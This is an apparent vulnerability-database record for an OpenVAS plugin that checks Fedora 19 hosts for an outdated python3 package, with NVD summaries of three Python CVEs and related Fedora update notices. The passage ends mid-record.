ID OPENVAS:1361412562310868482 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2020-03-02T00:00:00
Description
Check the version of python3
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for python3 FEDORA-2014-14257
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.868482");
script_version("2020-03-02T07:51:06+0000");
script_tag(name:"last_modification", value:"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)");
script_tag(name:"creation_date", value:"2014-11-14 06:45:26 +0100 (Fri, 14 Nov 2014)");
script_cve_id("CVE-2014-4650", "CVE-2013-4238", "CVE-2014-4616");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Fedora Update for python3 FEDORA-2014-14257");
script_tag(name:"summary", value:"Check the version of python3");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"affected", value:"python3 on Fedora 19");
script_tag(name:"solution", value:"Please install the updated package(s).");
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"FEDORA", value:"2014-14257");
script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
script_family("Fedora Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC19");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "FC19")
{
if ((res = isrpmvuln(pkg:"python3", rpm:"python3~3.3.2~10.fc19", rls:"FC19")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310868482", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for python3 FEDORA-2014-14257", "description": "Check the version of python3", "published": "2014-11-14T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868482", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["2014-14257", "https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html"], "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "lastseen": "2020-03-03T20:57:02", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"]}, {"type": "fedora", "idList": ["FEDORA:DB61F60CE102", "FEDORA:F219C21A3D", "FEDORA:79A3360CE877", "FEDORA:7A86F6087662", "FEDORA:E272360D99E0", "FEDORA:2827460D7732", "FEDORA:4FCC221CAB", "FEDORA:AE30560F3A00", "FEDORA:096D7228ED", "FEDORA:B215721F22"]}, {"type": "f5", "idList": ["SOL15638", "F5:K93278412", "F5:K15638"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842261", "OPENVAS:1361412562310867929", "OPENVAS:1361412562310871501", "OPENVAS:1361412562310868512", "OPENVAS:1361412562310122870", "OPENVAS:1361412562310867987", "OPENVAS:1361412562310868464", "OPENVAS:1361412562310120575", "OPENVAS:1361412562310867978", "OPENVAS:1361412562310122760"]}, {"type": "nessus", "idList": ["FEDORA_2014-14245.NASL", "FEDORA_2014-14208.NASL", "MANDRIVA_MDVSA-2015-076.NASL", "UBUNTU_USN-2653-1.NASL", "FEDORA_2014-14257.NASL", "ORACLELINUX_ELSA-2015-2101.NASL", "REDHAT-RHSA-2015-2101.NASL", "SL_20151119_PYTHON_ON_SL7_X.NASL", "CENTOS_RHSA-2015-2101.NASL", "FEDORA_2014-7772.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13867", "SECURITYVULNS:DOC:31253", "SECURITYVULNS:VULN:13303"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1582", "ELSA-2015-2101", "ELSA-2015-1064"]}, {"type": "ubuntu", "idList": ["USN-2653-1", "USN-1982-1"]}, {"type": "redhat", "idList": ["RHSA-2015:1064", "RHSA-2015:2101", "RHSA-2013:1582"]}, {"type": "centos", "idList": ["CESA-2013:1582", "CESA-2015:2101"]}, {"type": "amazon", "idList": ["ALAS-2014-440", "ALAS-2014-380", "ALAS-2014-374"]}, {"type": "hackerone", "idList": ["H1:12297"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:35A921A81EE6FB28E829D4305BB3A08D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127241"]}, {"type": "exploitdb", "idList": ["EDB-ID:33894"]}], "modified": "2020-03-03T20:57:02", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-03-03T20:57:02", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310868482", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14257\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868482\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 06:45:26 +0100 (Fri, 14 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2013-4238\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14257\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~10.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "naslFamily": "Fedora Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T06:14:31", "description": "Array index error in the scanstring function in the _json module in Python 2.7 through 3.5 and simplejson before 2.6.1 allows context-dependent attackers to read arbitrary process memory via a negative index value in the idx argument to the raw_decode function.", "edition": 6, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-08-24T20:29:00", "title": "CVE-2014-4616", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:python:python:3.4.0", "cpe:/a:python:python:2.7.10", "cpe:/a:python:python:3.0.1", "cpe:/a:python:python:3.4.1", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:3.5.0", "cpe:/a:python:python:3.4.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:python:python:2.7.0", "cpe:/a:python:python:3.2.0", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:3.4.2", "cpe:/a:python:python:3.3.4", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:2.7.9", "cpe:/a:python:python:3.3.6", "cpe:/a:python:python:3.3.3", "cpe:/a:python:python:3.3.0", "cpe:/a:python:python:3.0.0", "cpe:/a:python:python:3.1.0", "cpe:/a:python:python:3.3.5", "cpe:/a:python:python:2.7.12", "cpe:/o:opensuse_project:opensuse:12.3", "cpe:/a:python:python:3.4.4", "cpe:/a:python:python:2.7.13", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:2.7.2", "cpe:/a:python:python:3.2.2", "cpe:/a:python:python:3.2.1", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:3.3.2", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.4.6", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:3.2.4", "cpe:/a:python:python:3.4.5", "cpe:/a:python:python:2.7.11", "cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.5", "cpe:/a:python:python:3.4.7", "cpe:/a:python:python:2.7.8", "cpe:/a:python:python:3.2.6", "cpe:/a:python:python:3.3.1", "cpe:/a:python:python:2.7.7"], "id": "CVE-2014-4616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:python:python:2.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse_project:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:31", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4650"], "modified": "2020-02-26T13:49:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5.0", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.3.4", "cpe:/a:redhat:software_collections:-", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:55", "description": "The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.", "edition": 6, "cvss3": {}, "published": "2013-08-18T02:52:00", "title": "CVE-2013-4238", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238"], "modified": "2019-10-25T11:53:00", "cpe": ["cpe:/a:python:python:2.6.3", "cpe:/a:python:python:2.6.8", "cpe:/a:python:python:3.0.1", "cpe:/a:python:python:2.7.1150", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:3.2", "cpe:/a:python:python:2.7.2150", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:2.6.5", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:2.6.2", "cpe:/a:python:python:3.1", "cpe:/a:python:python:2.6.6", "cpe:/a:python:python:2.6.7", "cpe:/a:python:python:2.7.2", "cpe:/a:python:python:3.0", "cpe:/o:opensuse:opensuse:11.4", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:python:python:2.6.2150", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:3.3", "cpe:/o:opensuse:opensuse:12.2", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.4", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:2.6.4", "cpe:/a:python:python:2.6.1", "cpe:/a:python:python:3.1.2150", "cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.2150", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:python:python:2.6.6150"], "id": "CVE-2013-4238", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4238", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3:beta2:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.6150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2150:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2150:*:*:*:*:*:x64:*", "cpe:2.3:a:python:python:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:x64:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:-:lts:*:*:*:*:*", "cpe:2.3:a:python:python:3.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4:alpha1:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-11-13T18:14:28", "published": "2014-11-13T18:14:28", "id": "FEDORA:79A3360CE877", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-10.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-11-09T15:45:22", "published": "2014-11-09T15:45:22", "id": "FEDORA:E272360D99E0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python3-3.3.2-18.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-11-10T06:36:31", "published": "2014-11-10T06:36:31", "id": "FEDORA:AE30560F3A00", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: python3-3.4.1-16.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2014-07-17T04:28:18", "published": "2014-07-17T04:28:18", "id": "FEDORA:4FCC221CAB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-9.fc19", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-07-17T04:29:36", "published": "2014-07-17T04:29:36", "id": "FEDORA:096D7228ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python-2.7.5-13.fc19", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2014-4650"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-11-22T12:44:28", "published": "2014-11-22T12:44:28", "id": "FEDORA:7A86F6087662", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python-2.7.5-15.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238", "CVE-2013-7338", "CVE-2014-2667", "CVE-2014-4650"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2015-01-06T06:16:20", "published": "2015-01-06T06:16:20", "id": "FEDORA:DB61F60CE102", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-11.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-06-30T10:31:50", "published": "2014-06-30T10:31:50", "id": "FEDORA:F219C21A3D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python-2.7.5-13.fc20", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4650"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-11-09T15:47:21", "published": "2014-11-09T15:47:21", "id": "FEDORA:2827460D7732", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python-2.7.5-15.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2013-11-26T04:01:31", "published": "2013-11-26T04:01:31", "id": "FEDORA:88F7421515", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-8.fc19", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "f5": 